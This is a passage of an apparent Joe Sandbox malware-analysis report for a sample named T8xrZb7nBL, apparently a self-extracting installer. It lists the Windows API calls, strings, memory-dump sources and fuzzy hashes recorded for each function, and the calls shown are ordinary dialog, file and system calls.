                                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                            • String ID:
                                                                            • API String ID: 2586545124-0
                                                                            • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                            • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                            • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                            • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                              • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                            • wsprintfA.USER32 ref: 00403C31
                                                                            • wsprintfA.USER32 ref: 00403C5E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$wsprintf
                                                                            • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                            • API String ID: 2704270482-695273242
                                                                            • Opcode ID: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                            • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                            • Opcode Fuzzy Hash: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                            • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                            • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                            • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                            • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$Focus
                                                                            • String ID:
                                                                            • API String ID: 3946207451-0
                                                                            • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                            • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                            • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                            • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                            • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                            • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressLibraryLoadProc
                                                                            • String ID: hA$SetWindowTheme$uxtheme
                                                                            • API String ID: 324724604-1539679821
                                                                            • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                            • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                            • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                            • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                            • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                            • GetDC.USER32(00000000), ref: 004076E7
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                            • String ID:
                                                                            • API String ID: 2693764856-0
                                                                            • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                            • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                            • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                            • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 0040721C
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                            • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                            • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                            • SelectObject.GDI32(?,?), ref: 00407266
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                            • SelectObject.GDI32(?,?), ref: 004072A7
                                                                            • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                            • String ID:
                                                                            • API String ID: 2466489532-0
                                                                            • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                            • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                            • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                            • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                            • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                            • wsprintfW.USER32 ref: 0040821E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                            • String ID: %d%%
                                                                            • API String ID: 3753976982-1518462796
                                                                            • Opcode ID: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                            • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                            • Opcode Fuzzy Hash: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                            • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                            APIs
                                                                            • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                            • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                            • SuspendThread.KERNEL32(0000029C), ref: 0040841B
                                                                            • ResumeThread.KERNEL32(0000029C), ref: 00408438
                                                                            • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                                            • String ID:
                                                                            • API String ID: 4151135813-0
                                                                            • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                            • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                            • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                            • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%M/$%%M\
                                                                            • API String ID: 613200358-4143866494
                                                                            • Opcode ID: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                            • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                            • Opcode Fuzzy Hash: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                            • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%T/$%%T\
                                                                            • API String ID: 613200358-2679640699
                                                                            • Opcode ID: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                            • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                            • Opcode Fuzzy Hash: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                            • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%S/$%%S\
                                                                            • API String ID: 613200358-358529586
                                                                            • Opcode ID: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                            • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                            • Opcode Fuzzy Hash: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                            • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                            APIs
                                                                            • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                            • API String ID: 432778473-1797977924
                                                                            • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                            • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                            • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                            • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                              • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                              • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                              • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                              • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                            • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                            • API String ID: 4038993085-372238525
                                                                            • Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                            • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                            • Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                            • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: wsprintf$ExitProcesslstrcat
                                                                            • String ID: 0x%p
                                                                            • API String ID: 2530384128-1745605757
                                                                            • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                            • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                            • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                            • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407DB6
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                            • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                              • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                              • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                            • String ID: A
                                                                            • API String ID: 1557639607-3554254475
                                                                            • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                            • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                            • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                            • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                            APIs
                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                              • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                              • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                            • String ID: SetEnvironment
                                                                            • API String ID: 612612615-360490078
                                                                            • Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                            • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
